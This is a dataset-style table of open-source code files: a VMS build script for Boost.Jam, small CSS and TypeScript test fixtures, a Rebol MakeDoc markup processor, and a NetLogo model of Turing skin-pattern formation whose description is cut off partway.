content stringlengths 4 1.04M | lang stringclasses 358 values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
$ ! Copyright 2002-2003 Rene Rivera, Johan Nilsson.
$ !
$ ! 8-APR-2004 Boris Gubenko
$ ! Miscellaneous improvements.
$ !
$ ! 20-JAN-2015 Artur Shepilko
$ ! Adapt for jam 3.1.19
$ !
$ ! Distributed under the Boost Software License, Version 1.0.
$ ! (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
$ !
$ ! bootstrap build script for Jam
$ !
$ THIS_FACILITY = "BUILDJAM"
$
$ verify = f$trnlnm("VERIFY_''THIS_FACILITY'")
$ save_verify = f$verify(verify)
$
$ SAY := WRITE SYS$OUTPUT
$ !
$ ON WARNING THEN CONTINUE
$ ON ERROR THEN GOTO EXIT
$
$ BOOST_JAM_TOOLSET = "vmsdecc"
$ BOOST_JAM_CC = "CC"
$ BJAM_UPDATE = ""
$
$ ARGS = F$EDIT("''p1' ''p2' ''p3' ''p4'","TRIM,LOWERCASE")
$ ARGS_LEN = F$LENGTH(ARGS)
$
$ IF F$LOCATE("--update", ARGS) .NE. F$LENGTH(ARGS) THEN BJAM_UPDATE = "update"
$ IF BJAM_UPDATE .EQS. "update" -
.AND. F$SEARCH("[.bootstrap_vms]jam0.exe") .EQS. "" THEN BJAM_UPDATE = ""
$
$ IF BJAM_UPDATE .NES. "update"
$ THEN
$ GOSUB CLEAN
$
$ SAY "I|Creating bootstrap directory..."
$ CREATE /DIR [.bootstrap_vms]
$
$ !------------------
$ ! NOTE: Assume jamgram and jambase have been generated (true for fresh release).
$ ! Otherwise these need to be re-generated manually.
$ !------------------
$
$ SAY "I|Building bootstrap jam..."
$ !
$ CC_FLAGS = "/DEFINE=VMS /STANDARD=VAXC " + -
"/PREFIX_LIBRARY_ENTRIES=(ALL_ENTRIES) " + -
"/WARNING=DISABLE=(LONGEXTERN)" + -
"/OBJ=[.bootstrap_vms] "
$
$ CC_INCLUDE=""
$
$ SAY "I|Using compile flags: ", CC_FLAGS
$
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE command.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE compile.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE constants.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE debug.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE execcmd.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE frames.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE function.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE glob.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE hash.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE hdrmacro.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE headers.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE jam.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE jambase.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE jamgram.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE lists.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE make.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE make1.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE object.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE option.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE output.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE parse.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE pathsys.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE regexp.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE rules.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE scan.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE search.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE subst.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE timestamp.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE variable.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE modules.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE strings.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE filesys.c
$
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE execvms.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE pathvms.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE filevms.c
$
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE builtins.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE class.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE cwd.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE native.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE md5.c
$
$ CC_INCLUDE = "/INCLUDE=(""./modules"")"
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]set.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]path.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]regex.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]property-set.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]sequence.c
$ 'BOOST_JAM_CC' 'CC_FLAGS 'CC_INCLUDE [.modules]order.c
$
$ LIB /CREATE [.bootstrap_vms]jam0.olb [.bootstrap_vms]*.obj
$ LINK /EXEC=[.bootstrap_vms]jam0.exe -
[.bootstrap_vms]jam0.olb/INCLUDE=JAM/LIB
$
$ IF F$SEARCH("[.bootstrap_vms]*.obj") .NES. "" THEN -
DELETE /NOCONF /NOLOG [.bootstrap_vms]*.obj;*, *.olb;*
$ ENDIF
$
$ IF F$SEARCH("[.bootstrap_vms]jam0.exe") .NES. ""
$ THEN
$ IF BJAM_UPDATE .NES. "update"
$ THEN
$ SAY "I|Cleaning previous build..."
$ MCR [.bootstrap_vms]jam0.exe -f build.jam --toolset='BOOST_JAM_TOOLSET' 'ARGS' clean
$ ENDIF
$
$ SAY "I|Building Boost.Jam..."
$ MCR [.bootstrap_vms]jam0.exe -f build.jam --toolset='BOOST_JAM_TOOLSET' 'ARGS'
$ ENDIF
$
$
$EXIT:
$ sts = $STATUS
$ exit 'sts' + (0 * f$verify(save_verify))
$CLEAN: !GOSUB
$ !
$ IF F$SEARCH("[.bootstrap_vms]*.*") .NES. ""
$ THEN
$ SAY "I|Cleaning previous bootstrap files..."
$ !
$ SET FILE /PROT=(W:RWED) [.bootstrap_vms]*.*;*
$ DELETE /NOCONF /NOLOG [.bootstrap_vms]*.*;*
$ ENDIF
$ !
$ IF F$SEARCH("bootstrap_vms.dir") .NES. ""
$ THEN
$ SAY "I|Removing previous bootstrap directory..."
$ !
$ SET FILE /PROT=(W:RWED) bootstrap_vms.dir
$ DELETE /NOCONF /NOLOG bootstrap_vms.dir;
$ ENDIF
$ !
$ RETURN
| DIGITAL Command Language | 4 | MaxSac/build | src/engine/build_vms.com | [
"BSL-1.0"
] |
*|div {} | CSS | 1 | mengxy/swc | crates/swc_css_parser/tests/fixture/esbuild/misc/pUymwoCxUAxDqtaTC7CaOQ/input.css | [
"Apache-2.0"
] |
Rebol [
Title: "MakeDoc"
Date: 14-Jun-2013
Author: "Christopher Ross-Gill"
File: %makedoc.r3
Version: 2.100.0
Purpose: "Versatile plain-text document markup format"
Rights: http://opensource.org/licenses/Apache-2.0
Type: module
Name: rgchris.makedoc
Exports: [
load-doc make-doc
]
Needs: [
%as.r3 %match.r3 %rsp.r3
]
History: [
14-Jun-2013 2.100.0 "Conversion to R3-Alpha"
]
Notes: [
"Finite State Machine Object" [
Title: "Finite State Machine"
Author: "Gabriele Santilli"
Home: http://www.colellachiara.com/soft/MD3/fsm.html
]
]
Root: %../makedoc/
]
import module [
Title: "Amend"
Name: reb4me.amend
Exports: [amend]
][
ascii: charset ["^/^-" #"^(20)" - #"^(7E)"]
digit: charset [#"0" - #"9"]
upper: charset [#"A" - #"Z"]
lower: charset [#"a" - #"z"]
alpha: union upper lower
alphanum: union alpha digit
hex: union digit charset [#"A" - #"F" #"a" - #"f"]
symbol: file*: union alphanum charset "_-"
url-: union alphanum charset "!'*,-._~" ; "!*-._"
url*: union url- charset ":+%&=?"
space: charset " ^-"
ws: charset " ^-^/"
word1: union alpha charset "!&*+-.?_|"
word*: union word1 digit
html*: exclude ascii charset {&<>"}
para*: path*: union alphanum charset "!%'+-._"
extended: charset [#"^(80)" - #"^(FF)"]
chars: complement nochar: charset " ^-^/^@^M"
ascii+: charset [#"^(20)" - #"^(7E)"]
wiki*: complement charset [#"^(00)" - #"^(1F)" {:*.<>[]} #"{" #"}"]
name: union union lower digit charset "*!',()_-"
wordify-punct: charset "-_()!"
bin-charset: func [set [binary!] /local out] [
out: charset {}
foreach val set [insert out val]
out
]
ucs: complement charset [#"^(00)" - #"^(7F)"]
utf-8: use [utf-2 utf-3 utf-4 utf-5 utf-b] [
utf-2: make bitset! 64#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////w==}
; #{C0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDF}
utf-3: make bitset! 64#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//}
; #{E0E1E2E3E4E5E6E7E8E9EAEBECEDEEEF}
utf-4: make bitset! 64#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/w==}
; #{F0F1F2F3F4F5F6F7}
utf-5: make bitset! 64#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPA=}
; #{F8F9FAFB}
utf-b: make bitset! 64#{AAAAAAAAAAAAAAAAAAAAAP//////////}
; #{
; 808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9F
; A0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBF
; }
[utf-2 1 utf-b | utf-3 2 utf-b | utf-4 3 utf-b | utf-5 4 utf-b]
]
inline: [ascii+ | utf-8]
text-row: [chars any [chars | space]]
text: [ascii | utf-8]
ident: [alpha 0 14 file*]
wordify: [alphanum 0 99 [wordify-punct | alphanum]]
word: [word1 0 25 word*]
number: [some digit]
integer: [opt #"-" number]
wiki: [some [wiki* | ucs]]
ws*: white-space: [some ws]
amend: func [rule [block!]] [
bind rule 'self
]
]
import module [
Title: "Make Doc"
Name: reb4me.makedoc
Exports: [load-doc make-doc] ; make-para
][
root: system/script/header/root
if all [
file? root
not find [#"/" #"~"] first root
][
root: join system/script/path root
]
load-next: func [string [string!] /local out] [
out: transcode/next to binary! string
out/2: skip string subtract length? string length? to string! out/2
out
]
load-scanpara: use [para!] [
para!: context amend [
para: copy []
emit: use [prev] [
func [data /after alt] [
all [alt in-word? data: alt]
prev: pick back tail para 1
case [
not string? data [append/only para data]
not string? prev [append para data]
true [append prev data para]
]
]
]
text: char: values: none
in-word?: false
in-word: [(in-word?: true)]
not-in-word: [(in-word?: false)]
string: use [mk ex] [
[
mk: {"} (
either error? try [
mk: load-next ex: mk
][
values: "="
][
ex: mk/2
values: reduce ['wiki mk/1]
]
) :ex
]
]
block: use [mk ex] [
[
mk: #"[" (
either error? try [
mk: load-next ex: mk
][
ex
values: "="
][
ex: mk/2
values: mk/1
]
) :ex ; ]
]
]
paren: use [mk ex] [
[
mk: #"(" (
either error? try [
mk: load-next ex: mk
][
ex
values: "="
][
ex: mk/2
values: mk/1
]
) :ex ; )
]
]
rule: none
scanpara: func [paragraph [string!]] [
clear para
parse/all paragraph rule
new-line/all para false
; probe para
copy para
]
]
load-scanpara: func [scanpara [file! url!]] [
if all [
scanpara: attempt [read scanpara]
scanpara: load/header scanpara
'paragraph = get in take scanpara 'type
][
make para! compose/only [rule: (amend scanpara)]
]
]
]
load-scanner: use [para! scanner!] [
scanner!: context amend [
doc: []
emit: func ['style data /verbatim] [
if string? data [
trim/tail data
unless verbatim [data: inline/scanpara data]
; unless verbatim [data: envelop data]
]
repend doc [style data]
]
inline: text: para: values: url-mark: none
term: [any space [newline | end]]
trim-each: [(foreach val values [trim/head/tail val])]
options: []
line: [any space copy text text-row term (trim/head/tail text)]
paragraph: [copy para [text-row any [newline text-row]] term]
lines: [any space paragraph]
indented: [some space opt text-row]
example: [
copy para some [indented | some newline indented]
(para: trim/auto para)
]
define: [copy text to " -" 2 skip [newline | any space] paragraph]
commas: [line (values: parse/all text ",") trim-each]
pipes: [line (values: parse/all text "|") trim-each]
block: [term (values: copy []) | line (values: any [attempt [load/all text] []])]
url-start: [url-mark: "http" opt "s" "://" opt "www."]
url-block: [:url-mark line (values: any [attempt [load/all text] copy []])]
rules: none
scandoc: func [document [string!]] [
clear doc
emit options options
parse/all document rules
new-line/skip/all doc true 2
doc
]
]
load-scanner: func [scandoc [file! url!] scanpara [file! url!]] [
if all [
not error? scandoc: try [read scandoc]
not none? scandoc
scandoc: load/header scandoc
'document = get in take scandoc 'type
][
scandoc: make scanner! compose/only [rules: (amend scandoc)]
if scandoc/inline: load-scanpara scanpara [
scandoc
]
]
]
]
fsm!: context [
initial: state: none
state-stack: []
goto-state: func [new-state [block!] retact [paren! none!]] [
insert/only insert/only state-stack: tail state-stack :state :retact
state: new-state
]
return-state: has [retact [paren! none!]] [
set [state retact] state-stack
state: any [state initial]
do retact
state-stack: skip clear state-stack -2
]
rewind-state: func [up-to [block!] /local retact stack] [
if empty? state-stack [return false]
stack: tail state-stack
retact: make block! 128
until [
stack: skip stack -2
append retact stack/2
if same? up-to stack/1 [
state: up-to
do retact
state-stack: skip clear stack -2
return true
]
head? stack
]
false
]
event: func [
evt [any-type!]
/local val ovr retact done?
][
if not block? state [exit]
until [
done?: yes
local: any [
find state evt
find state to get-word! type?/word evt
find state [default:]
]
if local [
parse local [
any [any-string! | set-word! | get-word!]
set val opt paren! (do val) [
'continue (done?: no)
|
'override set ovr word! (evt: to set-word! ovr done?: no)
|
none
][
'return (return-state)
|
'rewind? copy val some word! (
if not foreach word val [
if block? get/any word [
if rewind-state get word [break/return true]
]
false
][
done?: yes
]
)
|
set val word! set retact opt paren! (
either block? get/any val [goto-state get val :retact] [
done?: yes
]
)
|
none (done?: yes)
]
]
]
done?
]
]
init: func [initial-state [word! block!]] [
; _t_ "fsm_init"
if word? initial-state [
unless block? initial-state: get/any :initial-state [
make error! "Not a valid state"
]
]
clear state-stack: head state-stack
initial: state: initial-state
]
end: does [
; _t_ "fsm_end"
foreach [retact state] head reverse head state-stack [do retact]
]
]
load-emitter: use [emitter! para!] [
emitter!: context [
document: position: word: data: none
sections: context [
this: 0.0.0.0
reset: does [this: 0.0.0.0]
step: func [level /local bump mask] [
set [bump mask] pick [
[1.0.0.0 1.0.0.0]
[0.1.0.0 1.1.0.0]
[0.0.1.0 1.1.1.0]
[0.0.0.1 1.1.1.1]
] level
level: form this: this + bump * mask
clear find level ".0"
level
]
]
outline: func [doc [block!]] [
remove-each style doc: copy doc [
not find [sect1 sect2 sect3 sect4] style
]
doc
]
init-emitter: func [doc] [
sections/reset
foreach [word str] doc [
if w: find [sect1 sect2 sect3 sect4] word [
w: index? w
if w <= toc-levels [
sn: sections/step w
insert insert tail toc capture [make-heading/toc w sn copy/deep str] "<br>^/"
]
]
]
sections/reset
if no-title [emit toc state: normal]
]
toc: none
initialize: func [para [block!]] [
if string? pick para 1 [
insert para reduce [<initial> take pick para 1 </initial>]
]
para
]
no-indent: true
no-nums: true
make-heading: func [level num str /toc /local lnk] [
lnk: replace/all join "section-" num "." "-"
num: either no-nums [""] [join num pick [". " " "] level = 1]
either toc [
emit [{<a class="toc} level {" href="#} lnk {">}] emit-inline str emit [</a> newline]
][
emit [{<h} level { id="} lnk {">}] emit-inline str emit [{</h} level {>}]
]
]
emit-sect: func [level str /local sn] [
sn: sections/step level
make-heading level sn str
]
form-url: func [url [url!]] [
if parse url: form url amend [
copy url some [
some ascii
| change [
copy url ucs (url: join "%" enbase/base join #{} to integer! url/1 16)
] url | skip
]
][url]
]
hold-values: []
hold: func [value [any-type!]] [insert hold-values value value]
release: does [take hold-values]
out: {}
emit: func [value] [
insert tail out reduce value
]
states: value: options: none
inline: make fsm! []
emit-inline: func [
para [block!]
/with state [word! block!]
/local doc-position
][
doc-position: :position
unless block? state [
state: get in states any [:state 'inline]
]
inline/init state
forall para [
position: :para
set 'value para/1
inline/event :value
]
position: :doc-position
inline/end
]
raise: func [msg] [emit ["Emitter error: " msg]]
escape-html: :sanitize
inherit: func [parent-state new-directives] [
append new-directives parent-state
]
raise: func [msg] [
emit compose [{<ul class="attention"><li>} (msg) {</li></ul>}]
]
outline: make fsm! []
outline-do: func [doc [block!] state [block!]] [
outline/init state
forskip doc 2 [
position: :doc
set [word data] doc
outline/event to set-word! word
]
outline/end
]
generate: func [doc [block!]] [
clear hold-values
clear out
sections/reset
outline-do doc get in states 'initial
copy out
]
]
load-emitter: func [makedoc [file! url!]] [
if all [
makedoc: attempt [read makedoc]
makedoc: load/header makedoc
'emitter = get in take makedoc 'type
][
makedoc: make emitter! compose/only [states: context (makedoc)]
]
]
]
grammar!: context [
root: none
template: none
document: %document.r
paragraph: %paragraph.r
markup: %html.r
]
resolve: use [resolve-path] [
resolve-path: func [root [file! url!] target [none! file! url!]] [
case [
none? target [target]
url? target [target]
url? root [root/:target]
find/match target root [target]
target [root/:target]
]
]
resolve: func [options [object!]] [
options/root: any [options/root root]
options/document: resolve-path options/root options/document
options/paragraph: resolve-path options/root options/paragraph
options/markup: resolve-path options/root options/markup
if any [file? options/template url? options/template] [
options/template: resolve-path options/root options/template
]
options
]
]
load-doc: use [document! form-para] [
form-para: func [para [string! block!]] [
para: compose [(para)]
join "" collect [
foreach part para [
case [
string? part [keep part]
integer? part [keep form to char! part]
switch part [
<quot> [keep to string! #{E2809C}]
</quot> [keep to string! #{E2809D}]
<apos> [keep to string! #{E28098}]
</apos> [keep to string! #{E28099}]
][]
char? part [keep part]
]
]
]
]
document!: context [
options: source: text: document: values: none
outline: func [/level depth [integer!] /local doc] [
level: copy/part [sect1 sect2 sect3 sect4] min 4 max 1 any [depth 2]
remove-each [style para] doc: copy document [
not find level style
]
doc
]
title: has [title] [
if parse document [opt ['options skip] 'para set title block! to end] [
form-para title
]
]
render: func [/custom options [block! object! none!]] [
make-doc/custom self make self/options any [options []]
]
]
load-doc: func [
document [file! url! string! binary! block!]
/with model [none! block! object!]
/custom options [none! block! object!]
/local scanner
][
options: make grammar! any [options []]
resolve options
model: make document! any [model []]
model/options: options
model/values: make map! []
case/all [
any [file? document url? document] [
model/source: document
document: any [read document ""]
]
binary? document [
document: to string! document
]
string? document [
model/text: document
if scanner: load-scanner options/document options/paragraph [
document: scanner/scandoc document
]
]
block? document [
model/document: :document
model
]
]
]
]
make-doc: func [
document [url! file! string! binary! block! object!]
/with model [block! object!]
/custom options [block! object!]
/local template emitter
][
options: make grammar! any [options []]
resolve options
unless object? document [
document: load-doc/with/custom document model options
]
if object? document [
case [
all [
template: options/template
template: case/all [
file? template [
template: attempt [read template]
]
url? template [
template: attempt [read template]
]
binary? template [
template: to string! template
]
string? template [template]
]
][
document/options/template: none
render/with template [document]
]
emitter: load-emitter options/markup [
emitter/document: document
emitter/generate document/document
]
]
]
]
]
| Rebol | 4 | rgchris/Scripts | r3-alpha/makedoc.r3 | [
"Apache-2.0"
] |
// @target: es6
(class { static x = 0; });
| TypeScript | 3 | nilamjadhav/TypeScript | tests/cases/compiler/classExpressionWithStaticPropertiesES64.ts | [
"Apache-2.0"
] |
patches-own
[
new-color ;; currently, always either white or black
inner-neighbors ;; other cells in a circle around the cell
outer-neighbors ;; other cells in a ring around the cell (but usually not touching the cell)
]
to setup
clear-all
;; computes inner and outer neighbors in an ellipse around each cell
ask patches
[
set inner-neighbors ellipse-in inner-radius-x inner-radius-y
;; outer-neighbors needs more computation because we want only the cells in the circular ring
set outer-neighbors ellipse-ring outer-radius-x outer-radius-y inner-radius-x inner-radius-y
]
ifelse any? patches with [ count outer-neighbors = 0 ]
[ user-message word "It doesn't make sense that 'outer' is equal to or smaller than 'inner.' "
" Please reset the sliders and press Setup again."
stop]
[restart]
reset-ticks
end
;; this procedure sets approximately initial-density percent of the
;; cells white and the rest black; if initial-density is set at 50%
;; then about half the cells will be white and the rest black
to restart
ask patches
[ ifelse random-float 100.0 < initial-density
[ set pcolor white ]
[ set pcolor black ] ]
reset-ticks
end
to go
ask patches [ pick-new-color ]
ask patches [ set pcolor new-color ]
tick
end
to pick-new-color ;; patch procedure
let activator count inner-neighbors with [pcolor = white]
let inhibitor count outer-neighbors with [pcolor = white]
;; we don't need to multiply 'activator' by a coefficient because
;; the ratio variable keeps the proportion intact
let difference activator - ratio * inhibitor
ifelse difference > 0
[ set new-color white ]
[ if difference < 0
[ set new-color black ] ]
;; note that we did not deal with the case that difference = 0.
;; this is because we would then want cells not to change color.
end
;;; procedures for defining elliptical neighborhoods
to-report ellipse-in [x-radius y-radius] ;; patch procedure
report patches in-radius (max list x-radius y-radius)
with [1.0 >= ((xdistance myself ^ 2) / (x-radius ^ 2)) +
((ydistance myself ^ 2) / (y-radius ^ 2))]
end
to-report ellipse-ring [outx-radius outy-radius inx-radius iny-radius] ;; patch procedure
report patches in-radius (max list outx-radius outy-radius)
with [1.0 >= ((xdistance myself ^ 2) / (outx-radius ^ 2)) +
((ydistance myself ^ 2) / (outy-radius ^ 2))
and 1.0 < ((xdistance myself ^ 2) / (inx-radius ^ 2)) +
((ydistance myself ^ 2) / (iny-radius ^ 2))
]
end
;; The following two reporter give us the x and y distance magnitude.
;; you can think of a point at the tip of a triangle determining how much
;; "to the left" it is from another point and how far "over" it is from
;; that same point. These two numbers are important for computing total distances
;; in elliptical "neighborhoods."
;; Note that it is important to use the DISTANCEXY primitive and not
;; just take the absolute value of the difference in coordinates,
;; because DISTANCEXY handles wrapping around world edges correctly,
;; if wrapping is enabled (which it is by default in this model)
to-report xdistance [other-patch] ;; patch procedure
report distancexy [pxcor] of other-patch
pycor
end
to-report ydistance [other-patch] ;; patch procedure
report distancexy pxcor
[pycor] of other-patch
end
; Copyright 2003 Uri Wilensky.
; See Info tab for full copyright and license.
@#$#@#$#@
GRAPHICS-WINDOW
309
10
622
324
-1
-1
5.0
1
10
1
1
1
0
1
1
1
-30
30
-30
30
1
1
1
ticks
30.0
BUTTON
205
60
294
93
NIL
setup
NIL
1
T
OBSERVER
NIL
NIL
NIL
NIL
1
BUTTON
218
254
289
287
NIL
go
T
1
T
OBSERVER
NIL
NIL
NIL
NIL
0
SLIDER
7
221
179
254
initial-density
initial-density
0
100
50.0
1
1
%
HORIZONTAL
SLIDER
7
257
180
290
ratio
ratio
0
2
0.35
0.01
1
NIL
HORIZONTAL
BUTTON
217
216
289
249
step
go
NIL
1
T
OBSERVER
NIL
NIL
NIL
NIL
0
BUTTON
216
179
289
212
NIL
restart
NIL
1
T
OBSERVER
NIL
NIL
NIL
NIL
1
SLIDER
8
37
180
70
inner-radius-x
inner-radius-x
0
10
3.0
1
1
cells
HORIZONTAL
SLIDER
8
72
180
105
inner-radius-y
inner-radius-y
0
10
3.0
1
1
cells
HORIZONTAL
SLIDER
7
106
180
139
outer-radius-x
outer-radius-x
0
10
6.0
1
1
cells
HORIZONTAL
SLIDER
7
141
179
174
outer-radius-y
outer-radius-y
0
10
6.0
1
1
cells
HORIZONTAL
@#$#@#$#@
## WHAT IS IT?
Does a single mechanism underlies such diverse patterns such as the stripes on a zebra, the spots on a leopard, and the blobs on a giraffe? This model is a possible explanation of how the patterns on animals' skin self-organize. It was first proposed by Alan Turing. If the model is right, then even though the animals may appear to have altogether different patterns, the rules underlying the formation of these patterns are the same and only some of the parameters (the numbers that the rules work on) are slightly different.
Thinking of the formation of fur in terms of rules also helps us understand how offspring of animals may have the same type of pattern, but not the same exact pattern. This is because what they have inherited is the rules and the values rather than a fixed picture. The process by which the rules and values generate a pattern is affected by chance factors, so each individual's pattern is different, but as long as the offspring receive the same rules and values, their own fur will self organize into the same type of pattern as their parents'.
## HOW IT WORKS
We model the animal skin by a square array of many melanocytes (pigment cells) that are each in either of two states: colorful ('D' for differentiated) or not-colorful ('U' for undifferentiated). The state of a cell can flip between D and U. The color cells (the D's) secrete two types of 'morphogens': activators (A) and inhibitors (I). Activators, on their own, cause a central cell to become colorful; inhibitors, on their own, cause the central cell to become not colorful. These competing morphogens are secreted in all directions so you can think of each color cell as creating a puddle that grows around it, spreading to other cells.
Each cell, whether or not it is colorful, is itself the center of its own neighborhood. For now, suppose the neighborhood is a circle. Say this circular neighborhood has a radius of 6 cells. This means that the cell in the center can be affected by other cells that are as far as 6 cells away from it in any direction. So if there is a D cell within this circle and it is secreting morphogens then these morphogens will diffuse as far as this central cell (but a D cell 7 cells away will not directly or immediately affect it). Also, each cells has an inner circle of radius, say, 3 cells.
D cells within the inner circle each contributes morphogens of type A (activator) to the central cell. Between the inner circle and the perimeter of the outer circle we have a ring of cells that are more than 3 cells away from the center but 6 or less cells away from the center. Every D cell in this outer ring contributes morphogens of type I (inhibitor) to the central cell. So at every moment each cell is affected both by activator and inhibitor cells in its circle and the question is will it ultimately be activated and become colorful or inhibited and lose its color (or just remain the way it was). The logic is that if the power of the activators is bigger than the power of the inhibitors then the cell will become colorful and vice versa (and if the power is balanced then nothing happens). The idea of "power" is that it's not enough to know how many morphogens there are of each type affecting a cell but one must multiply each cell by its "power" (or you can think of power in terms of the concentration of the morphogens in the inner and outer neighborhoods). Another idea is that since we'll be multiplying both types of morphogens by their power, we might as well just call the power of the activators "1" and the power of the inhibitors "w * 1" or just w. So w is the ratio between the power of the inhibitors and the activators. If w is bigger than 1 that means the power of the inhibitors is greater than that of the activators (for instance, if w = 2 then the inhibitors are each double as strong as each of the activators and if w = 0.5 then the inhibitors are half as strong as the activators). If w = 0.5 and if we have as many inhibitors as we have activators that are affecting the central cell, we would logically assume that the center cells would be more activated than inhibited and so would probably become (or remain) colorful on that step. (A tricky point to notice is that while a certain D-cell is activating a neighboring cell, this same D-cell can be inhibiting a different cell further away.)
Here are the rules that summarize what we've been discussing: count up all the D cells in the ring and call this number D*I (for instance 2 inhibitors), and count up all the D cells in the circle of radius three and call this number D*A (for instance, 5 activators). Then compute D*A - w*D*I, and:
* if it is > 0, set the central cell to D
* if it is < 0, set the central cell to U
* if it is = 0, leave the central cell unchanged
Note that this computation happens to all cells at the same time. After the first step and once the cells have been set accordingly, the entire business starts over at the next step. Once again, the cells are counted up according to the same rule. The rules have not changed but because some of the D cells are now U and vice versa we might get different counts and because of that -- different results of the "fight" between the A and I morphogens.
So what you see is that from step to step the individual cells often change from white (representing D or color cells) to black (representing U or no-color cells) and the overall impression is that the configuration of white and black changes as a whole. But these configurations are not random. You will see how these configurations often take form. Understanding how each cell behaves, as we have explained above, can help understanding how these global patterns take form.
All these explanations were for circular neighborhoods. In this model, the neighborhoods may be elliptical instead of circular. This is needed to produce stripes instead of spots.
## HOW TO USE IT
In order that your first experiment will more-or-less match the explanations above, you should choose to set the initial-density slider to 50% (that gives each cell an equal chance of being white or black to start with and so the whole window will be roughly 50% white), set the INNER-RADIUS-X and INNER-RADIUS-Y sliders to 3 and the OUTER-RADIUS-X and OUTER-RADIUS-Y sliders to 6, and set RATIO to 0.35 (that means the I morphogens are 35% as powerful as the A morphogens). Now press SETUP. (In later experiments you are welcome to change those settings in various combinations.) It will take a while to complete. If you press STEP the model will advance a single step. If you press GO the model will keep stepping indefinitely.
It takes a while for the patches to determine their neighborhoods. Because of this, only press SETUP when you change the radius sliders. If you only change the INITIAL-DENSITY and RATIO sliders or if you'd like to run the model again with the same settings, press RESTART instead of SETUP. The RESTART button doesn't ask the patches to recalculate their neighborhoods.
## THINGS TO NOTICE
As the model runs, patterns may begin to emerge. Eventually, they stabilize. (Well, sometimes the model will run into an endless flip-flop between two states, but we could call that dynamic stability.) Even when it seems to come to a halt, the model is still running and executing the commands and carrying out the computations, but nothing is changing visibly. This is because for each and every cell the power of activators is equal to that of the inhibitors, so nothing changes.
## THINGS TO TRY
Run the model with different INITIAL-DENSITY settings. How, if at all, does the value of the INITIAL-DENSITY affect the emergent pattern? Do you get the same pattern? Do you get a different pattern? Does it take longer?
Note how fragile the self organization of the cells is to slight changes in parameters. If you hold all other factors and slightly change just the RATIO, from trial to trial, you will note that for small ratios you will invariably get completely white fur and for high ratios you will invariably get completely black fur (why is that?). For ratios in between it fluctuates. That happens partially because the initial setting of black/white coloration has a random element to it (see the RESTART procedure in the code).
Try changing the sliders to have different values in the X and Y directions.
## EXTENDING THE MODEL
